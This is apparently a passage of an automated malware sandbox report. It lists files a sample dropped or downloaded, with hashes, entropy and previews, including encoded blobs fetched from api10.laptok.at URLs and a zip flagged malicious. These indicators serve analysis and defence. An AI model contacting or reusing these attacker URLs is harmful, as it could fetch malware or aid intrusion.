                                                                                                                                                  Size (bytes):662
                                                                                                                                                  Entropy (8bit):5.136210594558597
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:TMHdNMNxvLSj8VnWimI002EtM3MHdNMNxvLSj8VnWimI00OYGmZEtMb:2d6NxvRSZHKd6NxvRSZ7Yjb
                                                                                                                                                  MD5:96A46DE45D8F2F131988B9F480F8AC7D
                                                                                                                                                  SHA1:CBEBA5FE699C5E04D3DC2373DC46CE73F944BCB1
                                                                                                                                                  SHA-256:4B98390C39FA17643CAEB61376C029CDB9A4971FEC6E8F7433567AD7247DAD57
                                                                                                                                                  SHA-512:720CEC3FD8777423C84197A4A9075C11B00C691DFF0D8BB15EDCE08642C1A2C63A71FC096BE353A82D03814E116EEFB8BA285CB26C81CBEBC66977D0895DC0E5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xee4f6471,0x01d6c298</date><accdate>0xee4f6471,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xee4f6471,0x01d6c298</date><accdate>0xee4f6471,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):647
                                                                                                                                                  Entropy (8bit):5.117413717774021
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:TMHdNMNxiyoMjMoMVnWimI002EtM3MHdNMNxiyoMjMoMVnWimI00OYGd5EtMb:2d6Nx1ajSZHKd6Nx1ajSZ7YEjb
                                                                                                                                                  MD5:F083A03BE8884A26EDC2F0396B479B4E
                                                                                                                                                  SHA1:1211D26BB87B8046E6D322385E54D56FC8BB3599
                                                                                                                                                  SHA-256:84B92D1BCAB518F133C533085AFC94BFA3C71E84B3312E1F5A214C4A0DD0DDBF
                                                                                                                                                  SHA-512:E47039AC99239D07A52EEB47467F9E2C5CEC4058DDE791162803B5F1275BE08D9B90E502EC1EDDFB3F12CAFAD3BCC56A82F60029E492826575EB5B081006CD33
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xee4a9fbf,0x01d6c298</date><accdate>0xee4a9fbf,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xee4a9fbf,0x01d6c298</date><accdate>0xee4a9fbf,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):656
                                                                                                                                                  Entropy (8bit):5.15039136117362
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:TMHdNMNxhGwSj8VnWimI002EtM3MHdNMNxhGwSj8VnWimI00OYG8K075EtMb:2d6NxQ0SZHKd6NxQ0SZ7YrKajb
                                                                                                                                                  MD5:8895957154949A4706F0DEF814F770CD
                                                                                                                                                  SHA1:38E577A5BAF4AE532ABFB809FC76ED9F2974B201
                                                                                                                                                  SHA-256:2FBA92598D57181A87B83A8A70E8EBF8864226BE75DBB9B17CEF752049C3AA18
                                                                                                                                                  SHA-512:F40A866C1404920A2017D154D80FCB4D71936D6AF613CD4F5D9E91B1F5F5C9D0ADA90872DF00F25476C8C3C17BF239992CF88809A128C007CF2791547768B739
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xee4f6471,0x01d6c298</date><accdate>0xee4f6471,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xee4f6471,0x01d6c298</date><accdate>0xee4f6471,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):653
                                                                                                                                                  Entropy (8bit):5.086960229611107
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:TMHdNMNx0ni5jM5VnWimI002EtM3MHdNMNx0ni5jM5VnWimI00OYGxEtMb:2d6Nx0i6jSZHKd6Nx0i6jSZ7Ygb
                                                                                                                                                  MD5:E72D566521BE120185AB36D473462F02
                                                                                                                                                  SHA1:2621C0A7B13117E2DE8968AA741E4213C4AAA306
                                                                                                                                                  SHA-256:2DDC5821699E87C2CBE241270D96411C6794FF865F768DDD02784B449BDAC773
                                                                                                                                                  SHA-512:83C93A5F0BD3E04AC82083355A51ACA25CCA9C489843291087D8F9F30D18715F0CA19B9E037B54B7C8944C357830FFE165BA670B1B609F20683F7C3AF48354A5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xee4d021a,0x01d6c298</date><accdate>0xee4d021a,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xee4d021a,0x01d6c298</date><accdate>0xee4d021a,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):656
                                                                                                                                                  Entropy (8bit):5.125421039224645
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:TMHdNMNxxi5jM5VnWimI002EtM3MHdNMNxxi5jM5VnWimI00OYG6Kq5EtMb:2d6Nxo6jSZHKd6Nxo6jSZ7Yhb
                                                                                                                                                  MD5:4199DF63EF7E7ABCF1873B1B5748EAE7
                                                                                                                                                  SHA1:E386BE6E104C9D2C138B69F20B32B17439EDC454
                                                                                                                                                  SHA-256:B5ECCB3B661016A616A5C37608922AE693E8E3DAAF3C7326228E3D208766AA82
                                                                                                                                                  SHA-512:1A437E774E4E5B939BEF6BA4DC81F4DAF2030BF899B0A03E5369DC5EC0982C04FA680915AC34842CC58020ADEB96CE47FE4F161D23A453F6F53FEB6E917E834A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xee4d021a,0x01d6c298</date><accdate>0xee4d021a,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xee4d021a,0x01d6c298</date><accdate>0xee4d021a,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):659
                                                                                                                                                  Entropy (8bit):5.115410230705591
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:TMHdNMNxcyoMjMoMVnWimI002EtM3MHdNMNxcyoMjMoMVnWimI00OYGVEtMb:2d6NxzajSZHKd6NxzajSZ7Ykb
                                                                                                                                                  MD5:129D6E98D96D11CD87309DC26645D861
                                                                                                                                                  SHA1:DF538D1CF3EAC7D1B3DF6591D2BCA8E93CD1654F
                                                                                                                                                  SHA-256:E5C2CC88B4EDE3B9BDC63DA6384F1482B0F5224BCE1ED8509FE1DADF5A5E347A
                                                                                                                                                  SHA-512:3B27D2C2BA266DFAFE3697975E76ADBA6E51B0EA0ECDD975F935E331FE68FF49D392DB659D7B1CD0C3E1B7AAD2B0D551C85A3A31D8B0B152B55920257C0233C2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xee4a9fbf,0x01d6c298</date><accdate>0xee4a9fbf,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xee4a9fbf,0x01d6c298</date><accdate>0xee4a9fbf,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):653
                                                                                                                                                  Entropy (8bit):5.1026832280870495
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:TMHdNMNxfnyoMjMoMVnWimI002EtM3MHdNMNxfnyoMjMoMVnWimI00OYGe5EtMb:2d6Nx6ajSZHKd6Nx6ajSZ7YLjb
                                                                                                                                                  MD5:BE71D9C1E4762C781FFCE45612F2E814
                                                                                                                                                  SHA1:482C3789419A25C2C57CB0197F761279DBF61FEF
                                                                                                                                                  SHA-256:2624F89CCE872CDB1981BBA731299A4B1FE3F6B72C3E51792B3317396142510D
                                                                                                                                                  SHA-512:B8237A49B5B6AB3BBC032C8E78988FE35E81CA526AE7F675E68FA57FEF0F37E4B25EE486D9AE8DDF3C2CA89E5ACE40BA29C6B7B2257CA6FED6591DB2F5BAB9D5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xee4a9fbf,0x01d6c298</date><accdate>0xee4a9fbf,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xee4a9fbf,0x01d6c298</date><accdate>0xee4a9fbf,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bf[1].htm
                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):267700
                                                                                                                                                  Entropy (8bit):5.999836336819629
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:LO9BcSK5cnihVRakwHDgwodbX+Un+IQ7fqjeMRmd1:LkLn8VRl1woVX+2RQrtBd1
                                                                                                                                                  MD5:FC226C805B21348897F9CF750630EBA6
                                                                                                                                                  SHA1:5F20971E026402B862B9A62A6B4CCCE997BFE90E
                                                                                                                                                  SHA-256:B2BA15FFD15238328B301C92BC4CB4CA7C5B500826146DBFACB98B261E12FB31
                                                                                                                                                  SHA-512:CC7D68BC7D29F45BBC9152AA9D360263B8F56675ED71C273C7750D9B268DF99A72C0B8CC2F0D2A1881784750D05CA8ABA9C5DA52393BA9AE27A2338F6EB13E2C
                                                                                                                                                  Malicious:false
                                                                                                                                                  IE Cache URL:http://api10.laptok.at/api1/wRVY2NGdrRF/A_2Fha_2BTMf9b/Bkb0axFyVYg6CTiYCB0u_/2BNYoZUqIeFy6mXY/RsCAvo5yVPYtDbs/KEFb4oNdgILibF2Swr/I2w7rEJuT/Pp84EV24JCnppdQDLtg7/0g_2BJz5R_2FkQu9e_2/FGSaB0rJRCWjGvLRGTnGVc/Iu0pUH4kxZUPO/79c_2Bxp/zIxSbOn31EVZ_2FT_2BE4Ox/zrp24711fz/qBCMvOouQ_2B_2FBw/tevTXGEDmXVA/Fo3RVdsoq0v/QtV4LsUKm4P4d7/Q_0A_0Dq_2BFdmy3Ge3KN/bxiA2odSfTOC3fY6/QHvvQODRC/J_2BkRbDk_2F/bf
                                                                                                                                                  Preview: bCDmG56/ZGJCnK57yB48316E1AwMxoZFpLJ/fL6RyHH6z8WWxfeP5zslI9nQJixRoABWeyYOh+QvmbbTogob9cq/3ayFjfEgr8iqVOjarjeS13gakZSlB5kYToxRul+cKcG5DoKRCFpia5IoNTX/cqQdxLTX41TXxNTjfFlnpJy88JrJLpXK8HMnRefEmshmLublL1L0nsQPylestSsciJS4KMnnDn0t/jzqFb9ej9iKhd58CiFPMmaQChq0SoL+BzPjSp20D5BFf3ayIVCFQp+I9tuN8q8q7hIJ6FpBcNvutQ3KX6863HQhKvpXkBrepMOcF0FYtvC9Tc/wFS+d6pmVVTf/ujpuwmI8HJSCQAj4JXtM7YpFLj87pnV0ijP+L+oF/AVd55puLadVfoxK+Is6XbJeLxCrgEBb/QWaL6SV8HBpDcQEPrcYDOznjDm8ATNlzK86vGAKxBfH8CiNw6qIaInwrJQ/rOIErZGDkTtyKGrvAkaHqg76KhBAiQ3BNn+H1nU27D0pO/KA58JS+10MCKOY31FWx9CAHcHarDnvbRnk0WTqje/i4QbODSp8g6XJuaa95ltgYOKbGxadZQ9IfFNVrSEwxRqYkBZcnGu2EtpWpC1Ks/fYLJOX/z1lelzjN5PluvEWV2H60wq06JnJl85dFWDBfcTjv/sS837YVzTtI1wae22Xzk2wERnobGvULJhD1FNbylgTCyH9UCS2Cq/NUzEARHSOZCnYB7woyDdlFIAbMHBkwHJV23NKATjqITLAkmobXJXh/zEItrLapPklZsumwXAolxOqgaRl9EmartlkRMjScYA6AtZSBcSgzDAxgZtyTr3kQQJscv4qgSjhVDW8kWO66xm8u/3H7SS/LXh3BryRRetoELZcetKWzVRTXAeeTiDajUn/ke8Gp7ra1aSdTNW/jhrUJ8UANKS4hUiafZ8HDBpR38v24/ZL4Db0DER2nJm+aHTEIBw66My91kYg1Xh6UlvK
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\N[1].htm
                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):2408
                                                                                                                                                  Entropy (8bit):5.984213394225501
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:OurJo1eykcgE0yDBKjVqAW1iuR6RVWuYRJb77okJIfWo:nKzkyvGPW13R6vYRNsfz
                                                                                                                                                  MD5:99911885EF8527B9BB520959D0400D23
                                                                                                                                                  SHA1:A214A86649EBA314D4BF4C1ED2AC48CAC7EEBA1B
                                                                                                                                                  SHA-256:6A56806C098AA9CD6ADFD325BE3E9A05FDA817BD175A469A5027339EEA4C9058
                                                                                                                                                  SHA-512:58A1F7252A01A5EEC8375316FB178361DC6A7D1AA6275370B760D15376EB47DE50901CD5F024AB6B738EB22FC0447D249126F76ABA3B2EBF81F4E2BE3CB96F8E
                                                                                                                                                  Malicious:false
                                                                                                                                                  IE Cache URL:http://api10.laptok.at/api1/tQTtTlNNyyTHp8mZxwj/87ufrUlrtp1usWYjjxq_2B/yAOH12_2F1IYJ/lKW5AYnq/_2BbaPBw_2BvxMvagxVqPyJ/jSUh2wAda1/gHbr670JVUq1KwK7N/6uxLXG5CHSWb/dgl5wFu8VM1/Rkwn44dvXkxcGr/6ai4evYmGZZapTEFZPM6t/l7dnGylpkoukj_2B/UIph5LMwbusYJYR/SgNVcjHjuu6gNQMV1u/yo8w_2BDc/tr29yULxa_2FW8vjKL1w/IkKYcWnRbp20t9pYrs_/0A_0DOoPdbEyCpXUb3P_2B/SP7qNsXNt82Vl/EBYqhcdo/ksN77WU_2Bu9u_2Bp6ImMCY/qmYYk7_2FYRubl/N
                                                                                                                                                  Preview: dc5Myj1zX7wL16anUxKQbz0PUOVZccb3OWc2KaU5+XF1MrQFi5BV7tYx7BVtZTNjiJ4fPn/SH+6LpMOl9zy0PHDvdc1lteTU0DMsO0xKrJ2AJBhibqs0KAZjyZ2sATERlhsdm7/JrNq5iWPBI026FWqTzpw/E+iy/D1HCAxeakEUXanAlqIYdJVX2tjtziBfVxf9HFOuD0gXtSQqptUTh1GuewVWXfg7K1l6qMZXohnzDheZ+hO4JWUdY1G6C5TU7nGN1CzHxAx9rzc+7dBrMEHMrX/hFNwnZC5YRnKDiiWkzqW3qNWXXU23dnvOno54EE6JnFwpj3a75ko3/blADxve+zDiEAqDbvVLJAn2SEEybIqQG+c1hUe4DM7q6dY6wTRaJ9+kr2Faq0KjxDpfAaz/J7eRc3F86mOUUfhhZ+qch//Zv9OEuUbEummoMGReikRWVckbemdwmEzVgNSCiHpCY3r0L/rCWu6Rnoxa8M/zPljyUBPcWXjFVJDxpOW7G6k/iaI8TEQDYJr+iDAWzmmCN1N89rVDh9xrDVNPNlpuifS7S1ByEqoMfoEpCnxManZ/5CmJes5lxUz1ksnZjPSTpcoVJcIBDP2Svyfq3smofUMt0BsVHGKDs7O9RKHta7HHWZ4cy8oiqh69Mh9d3WUcD6OzCzR2xgtGXLn3ik618P0/CZ/HozGsVwB671/tTlbLqnV9XUTaHtLmc57EPDB54VvJLM53YU0P7IceRAZiPfZ+Ad1GdKGoj2BmcRcuqjA6EQIDA3sy2AePwSr0wNqED9SRm/RvuyUvhoCrFizu/NKJG4ekC5vWFWOFo+X11EG3tLHladPjLUNDLRWz/Ii/89l0UFGTmkyHLIAw1wAOYZgkAohqmgmpEzhEgot2hGSg1MOhC+gnykRezoR7/P6726Zap1bjfYtnPJ7Wy6vUMKKhKYivcP/raiyymBY/h0MP2y3w+mCTOwMpD8D8v+6KHVOL4iD8miJtfC+m
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\s[1].htm
                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):338008
                                                                                                                                                  Entropy (8bit):5.999869391852298
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:X36/dI+cmFqVRwgq2o/JG/IRKIyyCmZm/hKC2Ny5vWb1OB/sQx2IKtA4QMO:a/dINmGREBXE3mUIC2nXc2IKW4Qp
                                                                                                                                                  MD5:03D61BB1F49164FA9812A5E896C67F3E
                                                                                                                                                  SHA1:85FA697A67481A5631B61FB3F539B4503B929EA1
                                                                                                                                                  SHA-256:CDE50C5D8FC8B941FD19E1F70B357635061FBFE6F9A0D5BD4C0CFD9F46BF8436
                                                                                                                                                  SHA-512:04E6947E4C892007BD46F9FAA52D9B792892A929AFDCD2797091F54EC65D2822366F0A0743EB20B9E1497B08E164F5DB194010186D31B65831CB9C839A71C784
                                                                                                                                                  Malicious:false
                                                                                                                                                  IE Cache URL:http://api10.laptok.at/api1/1uvbKU_2Bbc/ULu41miz1odgDS/0s31zFbFtyChQRUZdq4O6/uZoXvkdGnqZk3S6m/sjGRAy2VVHXHIWC/GbATokLhfRKxJIkWlf/rpIWzL8Zz/AoLyYIkQLp5Egmn3wei2/_2BYsLzf0AqH_2FfXyU/ERE14WKmMp42qnHDG4GKCW/dW1JtsfpRq1bQ/nxcOGVyd/44_2FNnM0ZUEbkxaxhi6GSR/lIHQEHFzka/2x7wIaFlGrWFy74sl/6cFqI7aHF8g5/CnaY7J6ktLq/m_0A_0DTO0929p/475exW0EBf88dYERW4hkW/yci4B7l977luXmG4/ieH0MCQdwnavDmP/zBg2fJ8N/s
                                                                                                                                                  Preview: ix+4zopyS5Zb1yhQYCwOCVX8cdmxlByXC8UyxeQK0zznJlDVK9Oxl8Rq1F05vsKoIReV9UZOLSxZ1jvHDnCVs4gT5YM0PY/Ugn/E4Q8lv7AbuXQNF919sT99Z5qQ5oLVwLPRJJjRaRs8w0Yb0L/FMjrqCAAQ3HHRoRJfEqVsmy5BRYhbJLTGlFiHAEQ6mXalmlkwlt1V9HFEZuG/O3LXXsAkNj9dgUwDEpOLhnTxRp0/XP3bIxs5gyKVhVPYphhfmr1dJrkKxo9a9/c5ibgljvaI/GdZWjwqqgLrhaQonD3/o9AhWMu2xZ3yXsA08eboPRIQXj9zOicR/ip6PtDVocwDkwimC+ACJ5uobFopja2yO3cVeiF2xJSzHxvccwII9EZFEhWpEavbPx/D4ZXg7YtbEbDoX1VWryX4fAcx9V7ZRJ3UrvXA0H4IzCvfoAvhXe9wu6gfxLWXaY0C47fRrcxJjFl5JJR0UMzb3bqE6I2qE0tF0H0UZ+Vr6+esPmFbLzjErDldhK8LrgEtO2y3wS82DKjypVmH68MYEedt1I1yssNAzaZbnlvrIs+r0sjCOUKrzhQlwWuIPbL7oJ+VeR5elHyyhnRFAsymKu8YMOJDEiqfqfUsosgV/OEm+kBstS7l8o+OlOdP67DLUNUjCZGHiG1Xdfxqwy7QePTlH5zKfmx7hucr/wDCYhWv9EGLpytc3Jt28tLKqXhrYFnInjBO84x8ZQEuaaj/QPUhqZbdulImaf/JkFslNxOrJh8NdV6/MN5noGp0Pepmur7ldmdzCM+WPkKW9EvlABimnJDYbt0QfkSKdAcHbCdchWLWVhDruMAn1GBH7Rx3kzUYBu3gK2CEIqq7n+EJuq9Yz4k/9IAXAiodT7OVSgOxcp34CPUsmkb8Rvqcu8dfndVOdARDUt1yXb2hBgteYrxc4Suuo59wOMPeYFueTpxivJQwKwAu9wu+I5z40daKVd6r4iwA0WExliDIbKfkWB+/
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11606
                                                                                                                                                  Entropy (8bit):4.8910535897909355
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
                                                                                                                                                  MD5:7A57D8959BFD0B97B364F902ACD60F90
                                                                                                                                                  SHA1:7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
                                                                                                                                                  SHA-256:47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
                                                                                                                                                  SHA-512:83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1192
                                                                                                                                                  Entropy (8bit):5.325275554903011
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFnCvK39tOBPnKdi5:qEPerB4nqRL/HvFnCvO9tOBfui5
                                                                                                                                                  MD5:5F0686EAB07B96DB46D73AE2F197B684
                                                                                                                                                  SHA1:A363868CCBA7CE93E82670B31F29B67898C43385
                                                                                                                                                  SHA-256:7E66330E60DB9E14D2E174A05C68CFE7B06D050E73D737C2426873E900B46C0A
                                                                                                                                                  SHA-512:7FF15E7DDD382E33FD2D762869751AB9296B5DDF33F442136D7F953F080B1FAE592B1B436E08F3298B7479B8C967BA708138FBE6A3FAEF637D272BFBF6006A4E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<...............)L..Pz.O.E.R............System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\8F31.bi1
                                                                                                                                                  Process:C:\Windows\System32\nslookup.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):112
                                                                                                                                                  Entropy (8bit):4.48992345445028
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:cPLgeqnhARtt7TSjjhThARtn6an:o0eqnWbtChWbn6a
                                                                                                                                                  MD5:1784914AE468F35A55BBAF2A8D746D04
                                                                                                                                                  SHA1:7959C412D18BEBCE89AF9DC3715AA17A703467B1
                                                                                                                                                  SHA-256:E32BFF5542AF45D88A381F1F0239906ACC07E086FD4F93D9A057A70D48DF4E1A
                                                                                                                                                  SHA-512:CD36A88A3E8E5D11B606B65A72070FD1A60960ED7D4CC0713274039E328038FD129FC57DD806A8F66D2A82E9AF18304E7E39E494A75ECD3B40CA7EA6EE3D688C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: Server: resolver1.opendns.com..Address: 208.67.222.222....Name: myip.opendns.com..Address: 84.17.52.25....
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Ammerman.zip
                                                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):41922
                                                                                                                                                  Entropy (8bit):7.9900732828260255
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:iPRP7HHNs72bLXJnkNQmgOAhghqgwZJTpT/6gKffcvv7ovDTvxfz:GRP7HnbLZkGLOKBJT2ffhvvxfz
                                                                                                                                                  MD5:94F926A14F611ED85B2AD7F5C108D930
                                                                                                                                                  SHA1:920C9F8B4B8100DEDA928646DBFABA7D8E7AA6DE
                                                                                                                                                  SHA-256:BA9979A733F1226AD56803023880155FECAAEDAB7ABB4DC9552BD674D47FE62F
                                                                                                                                                  SHA-512:3DD6E4E6381AC5128860FF102E4CD3625E5BB621A077CD367231BD8FB49CD9BE09C0DF0C2AC7EAD62015DE95C446904124041460555A78225ACB2D72DD8DC506
                                                                                                                                                  Malicious:true
